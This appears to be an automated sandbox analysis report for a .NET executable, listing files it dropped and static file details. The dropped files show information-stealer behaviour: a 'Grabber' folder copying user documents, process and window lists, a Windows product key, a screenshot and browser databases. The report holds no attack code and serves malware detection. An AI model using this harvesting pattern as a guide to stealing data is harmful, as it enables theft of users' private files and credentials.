                                                                                                                                                            Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\WSHEJMDVQC.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):282
                                                                                                                                                            Entropy (8bit):3.5191090305155277
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                                                                                            MD5:3A37312509712D4E12D27240137FF377
                                                                                                                                                            SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                                                                                            SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                                                                                            SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):190
                                                                                                                                                            Entropy (8bit):3.5497401529130053
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                            MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                            SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                            SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                            SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):504
                                                                                                                                                            Entropy (8bit):3.514398793376306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                            MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                            SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                            SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                            SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\System\Process.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17713
                                                                                                                                                            Entropy (8bit):5.691617069955551
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:43S73XO9PWkEYTkCeckdk4kKkv5GxjEjl5tXkMktcktgdUN7q0kmInqqfQNNRIyr:1jm5A/EyKCv2oqlO
                                                                                                                                                            MD5:91CDA8E4D17263CC955811367770EEC0
                                                                                                                                                            SHA1:9C8BB0B46C4E8665AD0C7A6A389306EDA661C5F5
                                                                                                                                                            SHA-256:349522C468BE2C4ADB7F20CF3751CD00D1E4A6150BDEE7B5F74729B1CB4CA291
                                                                                                                                                            SHA-512:F4DEAD8567B73BC8039312BA7B5DA6ECA0BC1C892186DDCC6E188BBE18A9F4607BC10457A680C95D20707F4415424ABAD2B140F8637172D516808489A871CA80
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: svchost..PID: 860..EXE: c:\windows\system32\svchost.exe..NAME: svchost..PID: 2152..EXE: c:\windows\system32\svchost.exe..NAME: svchost..PID: 1716..EXE: c:\windows\system32\svchost.exe..NAME: svchost..PID: 3868..EXE: c:\windows\system32\svchost.exe..NAME: tXfiegClAfqDEuXWI..PID: 6452..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: backgroundTaskHost..PID: 416..EXE: C:\Windows\system32\backgroundTaskHost.exe..NAME: svchost..PID: 3000..EXE: c:\windows\system32\svchost.exe..NAME: tXfiegClAfqDEuXWI..PID: 6016..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: ShellExperienceHost..PID: 3860..EXE: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe..NAME: tXfiegClAfqDEuXWI..PID: 3424..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: s

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\System\ProductKey.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29
                                                                                                                                                            Entropy (8bit):4.004364184708143
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:qIiIWgmvIn8V4t:q0WTa8V4t
                                                                                                                                                            MD5:EE5834CF7B99959504966496B05B7C25
                                                                                                                                                            SHA1:446FB2A13D57B2EAB4D0598608AF7C5FD55EC612
                                                                                                                                                            SHA-256:3CA9911782E07324F4AF0ED95BC314DE0A0DE36A72F0D54FD4B6EEA3F54D0E39
                                                                                                                                                            SHA-512:FE090F13392A1E15E3067EC06FE642139EA3E8183363309CFA5CACDC7270B4ED6F3E5554B660EE6BBBC93F1890F6ECA213C613BB9620A747E843478476A64DF3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:DBP2K-R7NFX-376CJ-BYY3P-C9P8X

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\System\ScanningNetworks.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):84
                                                                                                                                                            Entropy (8bit):4.6630509827051725
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                                                                                                            MD5:58CD2334CFC77DB470202487D5034610
                                                                                                                                                            SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                                                                                                            SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                                                                                                            SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\System\Windows.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14022
                                                                                                                                                            Entropy (8bit):5.674372191674035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:yrkHkDkpkykIk3k2kQkZk8kWkDkaknkzkgkJckJgkwk/kwkCIk+kbkpk9kZkjks+:3Lo
                                                                                                                                                            MD5:AF4DF0C7776E73B61D95CC7477228A86
                                                                                                                                                            SHA1:76D3E85E88A7EA28E0A715CDBB978AA44C587CBA
                                                                                                                                                            SHA-256:AB0269473619AB33D1423E57292F38751F5C03C9A9FFFCC223F9A7ED8EF8E511
                                                                                                                                                            SHA-512:AEECA6A682D0A942DCB8A398753860811AAA58BBB3B06EAEC5E2F06C568CED4911C846794E0575A5410AF75475C5EC18B54D59A71E40F9303BB15B76406BBE1F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 6452..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 6016..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 3424..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 5712..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 6420..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 598

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\System\WorldWind.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):104882
                                                                                                                                                            Entropy (8bit):7.9282435839384355
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Ih5rzswIgl19+yQ+dZTAoHYdu/AT4iQzK00q:SKwIgR+ylXf4gAT4iQx0q
                                                                                                                                                            MD5:36E55D05F61AC368384407AF234DCFB4
                                                                                                                                                            SHA1:3B84C2679EE1DE3F00877E5D2DD4E397CF1CECFE
                                                                                                                                                            SHA-256:C96147F18F04D61AE5404EBD796E510D5AE2668CFD8E75B2F303AE7159164239
                                                                                                                                                            SHA-512:43CAB966AF57DF4F7ACEDEA4EB60A15ECAA36E7275C1BB77FF12E089EDC41F650A318012D69B084B011A86C905E3D394B61C7B3011EF710480EF4DB84D3345BF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.|......I"]Z...I.y..[

                                                                                                                                                            C:\Users\user\AppData\Local\454051b90e95093324cebd96b44713b2\msgid.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4
                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:bLn:nn
                                                                                                                                                            MD5:4D95D05A4FC4EADBC3B9DDE67AFDCA39
                                                                                                                                                            SHA1:8A485A0EF914C8F42F9D9D16C568F9BDA888FEBD
                                                                                                                                                            SHA-256:9CD129F891C52EC5E398BB70D3289954935A42D882E9739EB01E925D51980C4A
                                                                                                                                                            SHA-512:C1E5402E420FD66B8AA0EBFDA43BF80842AA156CA539F95DEA1F1E88DBEF183A9FD3B712BAF9C83535268E152142860C794D8C83ED7CB7065F86B0E973FFCF8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:3917

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp27E2.tmp.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94208
                                                                                                                                                            Entropy (8bit):1.2891393435168748
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                            MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                            SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                            SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                            SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp2841.tmp.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):49152
                                                                                                                                                            Entropy (8bit):0.7876734657715041
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp2842.tmp.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):147456
                                                                                                                                                            Entropy (8bit):0.4788315576920595
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:YVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                                                                                                                                            MD5:CBB41FCD9B378BBF8B9CC262004C391E
                                                                                                                                                            SHA1:F88112D46F2882AA06A1605B727C505F9188AE8E
                                                                                                                                                            SHA-256:44636710014A0540F2FCE8378C97A99D9B673FA0A95A2C91AAA2DCC4EA7C5570
                                                                                                                                                            SHA-512:B10D30E1DF30D61D59D92C3F48DAF4B907DC3982452132B9E7101CEFEF56590C61D38C331ACDE4EE7CB7D808C3CA86080B5177BEF0D36997E1DCAF019BE05512
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp2843.tmp.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):147456
                                                                                                                                                            Entropy (8bit):0.4788315576920595
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:YVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                                                                                                                                            MD5:CBB41FCD9B378BBF8B9CC262004C391E
                                                                                                                                                            SHA1:F88112D46F2882AA06A1605B727C505F9188AE8E
                                                                                                                                                            SHA-256:44636710014A0540F2FCE8378C97A99D9B673FA0A95A2C91AAA2DCC4EA7C5570
                                                                                                                                                            SHA-512:B10D30E1DF30D61D59D92C3F48DAF4B907DC3982452132B9E7101CEFEF56590C61D38C331ACDE4EE7CB7D808C3CA86080B5177BEF0D36997E1DCAF019BE05512
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp2882.tmp.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94208
                                                                                                                                                            Entropy (8bit):1.2891393435168748
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                            MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                            SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                            SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                            SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):5.923954780042463
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            File name:file.exe
                                                                                                                                                            File size:174080
                                                                                                                                                            MD5:c03a7cedc3314e6f0dc26431503dd035
                                                                                                                                                            SHA1:3a4c09c8c54639a839ce19f49e9018e53ac6b2b8
                                                                                                                                                            SHA256:719169d99a13f958de7a3f58d34ac4262cc90924eea256c782ed0b82de6adc0a
                                                                                                                                                            SHA512:28d792343773e1c5c9fd0e526c8a05cb1c18dafb44bc957b79fef4c1079cf71e2fe984dfe3fb9a6855d744e88876410694552ec77cdc5e30c919a71f1f54923e
                                                                                                                                                            SSDEEP:3072:G+STW8djpN6izj8mZw+GSv5hqIPu/i9bcJ2cknew6+WpD:b8XN6W8mm+vvnXPSi9b4M
                                                                                                                                                            TLSH:DA04392437E81919E3FFDBB8F4B001258B72F8236913E76F299459EA1D62344E550BB3
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g............"...0.............>.... ........@.. ....................................`................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

